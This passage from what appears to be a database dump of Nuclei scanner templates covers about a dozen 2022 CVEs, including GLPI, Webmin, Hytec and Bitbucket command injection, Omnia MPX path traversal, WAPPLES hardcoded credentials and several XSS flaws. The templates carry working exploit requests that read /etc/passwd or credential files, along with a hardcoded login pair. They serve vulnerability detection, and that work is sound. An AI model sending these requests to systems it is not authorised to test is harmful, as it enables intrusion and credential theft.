CVE-2022-35151\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/366\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35151\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/youcans896768/APIV_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35151\n cwe-id: CWE-79\n epss-score: 0.02148\n epss-percentile: 0.8906\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,xss,kkfileview,keking\n\nhttp:\n - raw:\n - |\n GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '图片预览'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950", "hash": "6adae51317f11133423343bda994456e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855f" }, "name": "CVE-2022-35405.yaml", "content": "id: CVE-2022-35405\n\ninfo:\n name: Zoho ManageEngine - Remote Code Execution\n author: viniciuspereiras,true13\n severity: critical\n description: |\n Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability.\n reference:\n - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb\n - https://xz.aliyun.com/t/11578\n - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html\n - https://www.bigous.me/2022/09/06/CVE-2022-35405.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35405\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35405\n cwe-id: CWE-502\n epss-score: 0.97471\n epss-percentile: 0.99962\n cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_access_manager_plus\n shodan-query: http.title:\"ManageEngine\"\n tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp\n\nhttp:\n - method: POST\n path:\n - \"{{RootURL}}/xmlrpc\"\n\n body: |\n {{randstr}}big0us\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"faultString\"\n\n - type: word\n part: body\n words:\n - \"No such service [{{randstr}}]\"\n - \"No such handler: {{randstr}}\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: or\n# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950", "hash": "7fbe3f4e9bc468d464006629b91abcba", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308560" }, "name": "CVE-2022-35413.yaml", "content": "id: CVE-2022-35413\n\ninfo:\n name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials\n author: For3stCo1d\n severity: critical\n description: |\n WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.\n remediation: |\n Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.\n reference:\n - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413\n - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35413\n - https://www.pentasecurity.com/product/wapples/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35413\n cwe-id: CWE-798\n epss-score: 0.72077\n epss-percentile: 0.97989\n cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pentasecurity\n product: wapples\n shodan-query: http.title:\"Intelligent WAPPLES\"\n tags: cve,cve2022,wapples,firewall,default-login,pentasecurity\n\nhttp:\n - raw:\n - |\n POST /webapi/auth HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id={{username}}&password={{password}}\n\n payloads:\n username:\n - systemi\n password:\n - db/wp.no1\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"res_msg\":\"Authentication Success.\"'\n - '\"doc_id\":\"user_systemi\"'\n condition: and\n\n - type: word\n part: header\n words:\n - WP_SESSID=\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950", "hash": "f311c047d0a4c95354e98918f5db9f6c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308561" }, "name": "CVE-2022-35416.yaml", "content": "id: CVE-2022-35416\n\ninfo:\n name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting\n author: 0x240x23elu\n severity: medium\n description: |\n H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.\n reference:\n - https://github.com/advisories/GHSA-9x76-78gc-r3m9\n - https://github.com/Docker-droid/H3C_SSL_VPN_XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35416\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/bughunter0xff/recon-scanner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35416\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: h3c\n product: ssl_vpn\n shodan-query: http.html_hash:510586239\n tags: cve,cve2022,xss,vpn,h3c\n\nhttp:\n - raw:\n - |\n GET /wnm/login/login.json HTTP/1.1\n Host: {{Hostname}}\n Cookie: svpnlang=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950", "hash": "a8e27b35ad095853417ef096570b9c63", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308562" }, "name": "CVE-2022-35493.yaml", "content": "id: CVE-2022-35493\n\ninfo:\n name: eShop 3.0.4 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35493\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35493\n cwe-id: CWE-79\n epss-score: 0.00157\n epss-percentile: 0.52174\n cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\\/_store_website:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wrteam\n product: eshop_-_ecommerce_\\/_store_website\n shodan-query: http.html:\"eShop - Multipurpose Ecommerce\"\n tags: cve,cve2022,eshop,xss,wrteam\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Search Result for \\\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950", "hash": "ee3ecd6c8184c0864751d2147ed919df", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308563" }, "name": "CVE-2022-35653.yaml", "content": "id: CVE-2022-35653\n\ninfo:\n name: Moodle LTI module Reflected - Cross-Site Scripting\n author: iamnoooob,pdresearch\n severity: medium\n description: |\n A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.\n reference:\n - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35653\n - https://bugzilla.redhat.com/show_bug.cgi?id=2106277\n - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/\n - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35653\n cwe-id: CWE-79\n epss-score: 0.00921\n epss-percentile: 0.82544\n cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: moodle\n product: moodle\n shodan-query: title:\"Moodle\"\n tags: cve,cve2022,moodle,xss\n\nhttp:\n - raw:\n - |\n POST /mod/lti/auth.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n xxx\">=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"moodle-editor\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950", "hash": "5866efb6e4d8b238bb9c697d9223a65a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308564" }, "name": "CVE-2022-3578.yaml", "content": "id: CVE-2022-3578\n\ninfo:\n name: WordPress ProfileGrid <5.1.1 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345\n - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3578\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3578\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45981\n cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: metagauss\n product: profilegrid\n framework: wordpress\n tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=pm_add_group&id=\">&tab\")'\n condition: and\n# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950", "hash": "0aae97e750bf43d4374c21ed5648e885", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308565" }, "name": "CVE-2022-35914.yaml", "content": "id: CVE-2022-35914\n\ninfo:\n name: GLPI <=10.0.2 - Remote Command Execution\n author: For3stCo1d\n severity: critical\n description: |\n GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.\n reference:\n - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914\n - https://github.com/cosad3s/CVE-2022-35914-poc\n - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35914\n - https://github.com/glpi-project/glpi/releases\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35914\n cwe-id: CWE-74\n epss-score: 0.97399\n epss-percentile: 0.99914\n cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: glpi-project\n product: glpi\n shodan-query: http.favicon.hash:\"-1474875778\"\n tags: cve,cve2022,glpi,rce,kev,glpi-project\nvariables:\n cmd: \"cat+/etc/passwd\"\n\nhttp:\n - raw:\n - |\n POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: sid=foo\n\n sid=foo&hhook=exec&text={{cmd}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950", "hash": "7c58041ab9981bc5897b3ed09ae6c817", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308566" }, "name": "CVE-2022-36446.yaml", "content": "id: CVE-2022-36446\n\ninfo:\n name: Webmin <1.997 - Authenticated Remote Code Execution\n author: gy741\n severity: critical\n description: |\n Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade Webmin to version 1.997 or later to mitigate this vulnerability.\n reference:\n - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165\n - https://www.exploit-db.com/exploits/50998\n - https://github.com/webmin/webmin/compare/1.996...1.997\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36446\n - http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36446\n cwe-id: CWE-116\n epss-score: 0.97131\n epss-percentile: 0.99752\n cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: webmin\n product: webmin\n shodan-query: title:\"Webmin\"\n tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb\n\nhttp:\n - raw:\n - |\n POST /session_login.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}\n - |\n POST /package-updates/update.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\n mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{randstr}}'\n - 'uid'\n - 'gid'\n - 'groups'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950", "hash": "205da3c9836d654b424de22429556669", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308567" }, "name": "CVE-2022-36537.yaml", "content": "id: CVE-2022-36537\n\ninfo:\n name: ZK Framework - Information Disclosure\n author: theamanrawat\n severity: high\n description: |\n ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.\n remediation: |\n Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.\n reference:\n - https://github.com/Malwareman007/CVE-2022-36537/\n - https://tracker.zkoss.org/browse/ZK-5150\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36537\n - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-36537\n cwe-id: CWE-200\n epss-score: 0.95859\n epss-percentile: 0.99401\n cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: zkoss\n product: zk_framework\n shodan-query: http.title:\"Server backup manager\"\n tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss\n\nhttp:\n - raw:\n - |\n GET /login.zul HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\n Content-Length: 154\n\n ------WebKitFormBoundaryCs6yB0zvpfSBbYEp\n Content-Disposition: form-data; name=\"nextURI\"\n\n /WEB-INF/web.xml\n ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - .*\n - |-\n ((.|\n )*)welcome-file-list>\n - xml version\n - web-app\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: dtid\n group: 1\n regex:\n - \"dt:'(.*?)',cu:\"\n internal: true\n# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950", "hash": "7ae6c039219bd59a7a3a6071a91ef571", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308568" }, "name": "CVE-2022-36553.yaml", "content": "id: CVE-2022-36553\n\ninfo:\n name: Hytec Inter HWL-2511-SS - Remote Command Execution\n author: HuTa0\n severity: critical\n description: |\n Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36553\n - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml\n - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b\n - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html\n - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36553\n cwe-id: CWE-77\n epss-score: 0.46383\n epss-percentile: 0.9713\n cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: hytec\n product: hwl-2511-ss_firmware\n fofa-query: title=\"index\" && header=\"lighttpd/1.4.30\"\n zoomeye-query: app:\"Hytec Inter HWL-2511-SS\"\n tags: cve2022,cve,hytec,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n command:\n - \"cat%20/etc/passwd\"\n - \"type%20C://Windows/win.ini\"\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"contains(body_1, 'index')\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n - \"contains(body_1, 'index')\"\n condition: and\n# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950", "hash": "67f006a189deb0b6b165248129b42c53", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308569" }, "name": "CVE-2022-36642.yaml", "content": "id: CVE-2022-36642\n\ninfo:\n name: Omnia MPX 1.5.0+r1 - Local File Inclusion\n author: arafatansari,ritikchaddha,For3stCo1d\n severity: critical\n description: |\n Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX.\n reference:\n - https://www.exploit-db.com/exploits/50996\n - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36642\n - https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-36642\n cwe-id: CWE-862\n epss-score: 0.68515\n epss-percentile: 0.97692\n cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: telosalliance\n product: omnia_mpx_node_firmware\n shodan-query: http.title:\"Omnia MPX Node | Login\"\n tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd\"\n - \"{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"password\":'\n - '\"mustChangePwd\":'\n - '\"roleUser\":'\n condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950", "hash": "6cec7b71e772f8bd2673802d65713f10", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856a" }, "name": "CVE-2022-36804.yaml", "content": "id: CVE-2022-36804\n\ninfo:\n name: Atlassian Bitbucket - Remote Command Injection\n author: DhiyaneshDk,tess,sullo\n severity: high\n description: |\n Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate the vulnerability.\n reference:\n - https://github.com/notdls/CVE-2022-36804\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804\n - https://jira.atlassian.com/browse/BSERV-13438\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36804\n - http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-36804\n cwe-id: CWE-77\n epss-score: 0.97343\n epss-percentile: 0.99886\n cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: bitbucket\n shodan-query: http.component:\"BitBucket\"\n tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev\nvariables:\n data: '{{rand_base(5)}}'\n\nhttp:\n - raw:\n - |\n GET /rest/api/latest/repos HTTP/1.1\n Host: 